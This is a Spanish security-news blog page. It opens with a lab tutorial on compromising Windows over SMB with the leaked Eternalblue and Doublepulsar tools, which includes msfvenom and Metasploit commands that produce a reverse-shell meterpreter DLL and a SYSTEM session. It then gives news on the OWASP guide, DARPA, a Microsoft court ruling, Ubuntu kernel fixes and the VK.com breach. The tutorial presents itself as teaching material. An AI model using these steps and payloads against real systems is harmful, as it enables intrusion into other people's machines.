Categoría : Noticias de Seguridad

Inicio/Archivo por Categoría Noticias de Seguridad

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

OWASP Testing Guide v4.0 ahora en Español

Así es amigos, ahora podrán disfrutar de la muy conocida Guía de Pruebas OWASP 4.0 pero en su versión en español, gracias al trabajo y aporte de dos ecuatorianos, Fernando Vela y Roberto Andrade de la Escuela Politecnica Nacional,  que lo compartieron, podemos anunciar un pre-release de esta guía en nuestro idioma.

La versión 4 en español:  OWASP Testing Guide 4.0 en Español

La versión 4 en ingles  OWASP Testing Guide v 4.0

El documento esta dividido por :

  • Introducción al proyecto guía de pruebas de OWASP y el proyecto completo OWASP
  • Marco referencial al framework de pruebas de OWASP
  • Pruebas de seguridad de aplicaciones WEB
    • Introducción y objetivos
    • Pruebas para gestionar la configuración y la implementación
    • Pruebas de Administración de Identidad
    • Pruebas de autenticación
    • Pruebas de autorización
    • Pruebas de administración de sesión
    • Pruebas de validación de entradas
    • Pruebas de manejo de errores
    • Pruebas para Criptografía débil
    • Prueba de la lógica del negocio
    • Pruebas en el lado del cliente
  • Apéndice
    • Apéndice A: Herramientas de prueba
    • Apéndice B: Lecturas sugeridas
    • Apéndice C: Vectores Fuzz
    • Apéndice D: Inyección codificada

Metodología, puntos de control y pruebas de seguridad

Los tests o pruebas se agrupan en 11 categorías para sumar un total de 91 puntos de control:

  1. Information Gathering
  2. Configuration and Deployment Management Testing
  3. Identity Management Testing
  4. Authentication Testing
  5. Authorization Testing
  6. Session Management Testing
  7. Input Validation Testing
  8. Error Handling
  9. Cryptography
  10. Business Logic Testing
  11. Client Side Testing

OWASP tiene su propia wiki, a continuación un enlace, ahí tu puedes encontrar los puntos de control mencionado pero en un listado detallado.

Testing_Checklist

Este pre-relase tiene como con fin solicitar apoyo en la detección y corrección de errores antes de que sea oficialmente integrado al proyecto OWASP, por eso necesitamos tu apoyo si encuentras problemas de traducción por favor notifica a:

Fernando Vela   fercho.vela@gmail.com
Roberto Andrade   robertoandrade533@hotmail.com

Solo especifica el error, la pagina y el párrafo donde la encontraste dicho error de traducción.

Nos vemos pronto con mas novedades sobre el entorno de pruebas OWASP.

 

DARPA empleará superordenadores para detectar posibles errores de seguridad

En las últimas semanas parece que el gobierno de Estados Unidos está más preocupado que nunca en la viabilidad de sus sistemas de seguridad. Debido a esto no es de extrañar que hayan pedido a la Agencia de Proyectos de Investigación Avanzados de Defensa de Estados Unidos, conocida por todos como DARPA, que investigue su viabilidad y los ponga a prueba para detectar posibles problemas derivados del uso de software y sistemas obsoletos.

Una vez la misión ha sido encomendada a DARPA y, como no podía ser de otra manera, sobre todo gracias los fondos gubernamentales de los que goza, la agencia se ha puesto manos a la obra y su idea radica en poner a trabajar a gran parte de los superordenadores que hay en Estados Unidos para conseguir así localizar y resolver cualquier tipo de problema relacionado con los sistemas de seguridad de cualquiera de sus servicios.

DARPA pondrá a trabajar a los superordenadores estadounidense para encontrar problemas de seguridad en el software de sus equipos

Una vez más, DARPA vuelve a demostrar que, para ellos, una máquina está más capacitada que un ser humano. Para conseguir hacer realidad esto, la agencia acaba de organizar un concurso bautizado como Cyber Grand Challenge que será presentado en la DEFCON, conferencia anula de hackeo. En este concurso, siete egrupo de la academia y la industria medirán sus fuerzas contra siete ordenadores del Pentágono para ver quién tiene mayor capacidad.

Entre los equipos que participarán en este campeonato encontramos nada menos que a los ganadores de una competición previa organizada el año pasado. Tras ganar, estos tuvieron acceso a un ordenador dotado de un procesador de 1.000 núcleos y 16 terabits de memoria. Los enfrentamientos entre humanos y superordenadores se llevarán a cabo sin ninguna intervención humana. El ganador conseguirá un premio de 2 millones de dólares y una invitación para medir sus fuerzas con hackers humanos en la contienda de atrapa la bandera de la DEFCON

Fuente: actualidad gadget

La histórica sentencia que ganó Microsoft para no tener que entregar tus datos privados a las autoridades

Un tribunal de apelaciones en Estados Unidos determinó que las autoridades nacionales no pueden forzar al gigante de la informática Microsoft a entregarles información contenida en servidores alojados en otros países.

La decisión sienta un precedente histórico en materia de protección de la privacidad para servicios de computación en la nube.

“Deja claro que el gobierno de Estados Unidos no puede utilizar órdenesjudiciales en forma unilateral para llegar a otros países y obtener los correos electrónicos que pertenecen a personas de otras nacionalidades“, le dijo a la BBC Brad Smith, presidente y jefe legal de la compañía.

“Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube”, añadió.

Derechos digitales

El caso llegó a los tribunales después de que Microsoft se negara a otorgarle acceso al Departamento de Justicia a un servidor en Irlanda, como parte de una investigación en un expediente relacionado con drogas. Un tribunal en Manhattan le dio luz verde al Departamento de Justicia en 2014. Pero la corte de apelaciones deshizo esa decisión.

Le dice a la gente que puede, de verdad, confiar en la tecnología, cuando optan por mover su información a la nube” – Brad Smith, portavoz de Microsoft

El Departamento de Justicia rechazó el fallo e indicó que estaba evaluando el siguiente paso.

Si resuelve apelar, el caso caería en manos de la Corte Suprema de Justicia.

Varias empresas, como Amazon, Apple y Cisco, respaldaron a Microsoft en el caso.

Otra de las organizaciones que estuvo de su lado fue el Open Rigths Group, una ONG en Reino Unido que defiende los derechos digitales.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal”, declaró el director legal del grupo, Myles Jackman.

“La decisión del tribunal estadounidense mantiene el derecho a la privacidad individual frente la intrusión del Estado estadounidense en la libertad personal” Myles Jackman, Open Rights Group

“En consecuencia, los organismos de seguridad de Estados Unidos deben respetar el derecho a la privacidad digital de los ciudadanos europeos y la protección de sus datos personales“.

“Los Estados no deberían ir más allá de sus fronteras simplemente porque creen que, al hacerlo, pueden amedrentar a las compañías”, añadió.

Juego abierto a todos

Microsoft había advertido que permitir que se ejecutara la orden de judicial desataría un “juego abierto”, en el que otros países podían tratar de implementar órdenes similares para acceder a servidores ubicados en Estados Unidos.

Haciéndose eco de preocupaciones ampliamente extendidas en la industria tecnológica, la empresa sostuvo que, simplemente, las leyes estaban demasiado desactualizadas como para resultar efectivas.

Satya Nadella en una aparición pública en San FranciscoEl jefe de Microsoft, Satya Nadella, ha hecho de la computación en la nube y su seguridad el gran foco de la compañía.

La protección de la privacidad y las necesidades de las autoridades a cargo de hacer cumplir la ley requieren de nuevas soluciones que reflejen el mundo que existe hoy, en vez de tecnologías que existían hace tres décadas, cuando se aprobaron las leyes que están vigentes”, señaló la empresa.

Entre los organismos a cargo de velar por la seguridad, el orden y la legalidad hay una preocupación importante acerca de la posibilidad de que el almacenamiento en la red, junto a la encriptación, esté ofreciendo un espacio en el que los criminales pueden actuar a sus anchas.

Los límites de la cooperación

La juez Susan Carney, a cargo del expediente, falló en contra del Departamento de Justicia sobre la base de que la Ley de Comunicaciones Almacenadas (SAC, por sus siglas en inglés) de 1986 limitaba el alcance de las órdenes judiciales aplicables fuera de Estados Unidos.

La juez señaló que esas restricciones son vitales para mantener buenas relaciones con otros países.

Aun más, dijo que hay mecanismos para la cooperación entre naciones el curso de las investigaciones, aunque las autoridades con frecuencia se quejan de que tomar ese camino es más costoso y consume más tiempo.

Una persona usando una computadora
A las autoridades les preocupa que la nube le proporcione un “espacio seguro” a los criminales para operar.

“Ir a tribunales para pedir una orden bajo la SCA normalmente es más rápido que recurrir a los canales internacionales de resolución”, dijo Daniel Stoller, editor legal senior de la firma Bloomberg Law Privacy & Security News.

Stoller señaló que la sentencia original de 2014 interpretó la SCA de manera que favoreciera la visión del Departamento de Justicia. Pero la apelación le dio prioridad a la legislación internacional.

Otro juez involucrado en el juicio, Gerard Lynch, afirmó que la ley de 1986 necesitaba una actualización urgentemente.

“Estoy de acuerdo con el resultado”, escribió.

“Pero no creo de ninguna manera que el resultado debe ser tomado como algo que se convertirá en política racional, ni mucho menos celebrado como un hito en materia de protección de la privacidad“.

Fuente: BBC

Actualización del kernel para Ubuntu Linux

Ubuntu ha publicado una actualización del kernel para Ubuntu 14.04 LTS que soluciona 10 nuevas vulnerabilidades que podrían ser aprovechadas por atacantes para provocar denegaciones de servicio, obtener información sensible o comprometer los sistemas afectados.

Los problemas corregidos residen en la obtención de información sensible a través del driver Ethernet Atheros L2 (CVE-2016-2117), obtención de información sensible o denegaciones de servicio por lecturas fuera de límite en OZMO USB sobre drivers de dispositivos wifi (CVE-2015-4004), una condición de carrera en TLB (Translation Lookaside Buffer) del kernel de Linux (CVE-2016-2069),denegación de servicio a través del controlador USB de dispositivo digitalizador GTCO (CVE-2016-2187) y desactivación de protección ASLR (Address Space Layout Randomization) (CVE-2016-3672).

Por otra parte una denegación de servicio local por uso después de liberar en el controlador USB CDC Network Control Model (CVE-2016-3951), una escritura fuera de límites en la implementación USB/IP podría permitir la ejecución remota de código arbitrario (CVE-2016-3955), fuga de información en las implementaciones de ANSI/IEEE 802.2 LLC type 2 Support (CVE-2016-4485) y en la interfaz socket de rutado netlink (rtnetlink) (CVE-2016-4486) y por último una denegación de servicio local en fs/pnode.c (CVE-2016-4581).

Detalles sobre la aplicación de ésta actualización se encuentran disponibles en:

https://wiki.ubuntu.com/Security/Upgrades.

Más información:

USN-2989-1: Linux kernel vulnerabilities

http://www.ubuntu.com/usn/usn-2989-1/

Fuente: Hispasec

Google presenta versión gratuita de su nuevo Data Studio

data studio

Hace pocos meses Google presentó su Suite Google Analytics 360, y junto a ella una nueva plataforma de visualización de datos y presentación de informes para las grandes empresas – Data Studio 360.

Ahora han decidido crear una versión gratuita de Data Studio para las personas y los equipos más pequeños, una aplicación que permite conectar todos nuestros datos de marketing y crear informes sencillos de entender, compartir y personalizar.

En el blog de google analytics explican los detalles de esta nueva plataforma, disponible en google.com/analytics/data-studio para que sea posible comenzar a conocer los recursos ofrecidos. Podemos abrir la aplicación y realizar su tour, aunque para crear informes es necesario estar en Estados Unidos (de momento su uso está limitado geográficamente).

Cuenta con múltiples conectores de datos para crear paneles de monitorización, de forma que es posible mezclar fuentes de datos diferentes dentro de un mismo informe, como los de Google Analytics, bases de datos externas con conector SQL, Google Sheets y los de Google AdWords, por ejemplo.

En este vídeo muestran el paso a paso para comenzar con la plataforma:

Durante este mismo año abrirán las puertas para el resto de países, por lo que es mejor estar preparados pensando en cómo podemos usar Data Studio para ofrecer datos de todo tipo dentro de nuestra empresa.

Fuente: wwwhat’s new

190 millones de cuentas comprometidas en VK.com

La base de datos de la red social más grande de Rusia VK.com (Vkontakte), dueños también de Telegram, es la última gran filtración en línea. La base de datos contiene información como nombres completos (nombres y apellidos), correos electrónicos, información de la ubicación del usuario, direcciones, números de teléfono y las contraseñas de texto plano. Sí, las contraseñas de texto plano y al parecer fueron obtenidas de esa manera desde la base de datos de VK.com.

El mismo atacante “Peace_of_mind” que también  vende los datos de MySpace, Tumblr, LinkedIn y Fling.com, ahora está vendiendo más de 100 millones de registros de VK.com por sólo 1 Bitcoin (aprox. US$ 580).

La violación de datos fue divulgada inicialmente por el motor de búsqueda LeakedSource, que recibió porciones de la base de datos de una de las personas que lo compraron. La compañía ya ha analizado el contenido y lo ha añadido a su servicio (pago). Por lo tanto, se puede utilizar su motor de búsqueda para comprobar correos electrónicos  comprometidos.

VK.com es el “Facebook de Rusia” y se dice que es el sitio más grande de Europa con más de 350 millones de usuarios. Se cree que las credenciales fueron robadas a finales de 2012 o principios de 2013, cuando VK.com tenía casi 190 millones de usuarios.

Parece que todas las infracciones recientes fueron entre 2012 y 2013, cuando muchos sitios web no practicaban políticas adecuadas de seguridad, como tener contraseñas con hash y Salt.

Fuente: Segu info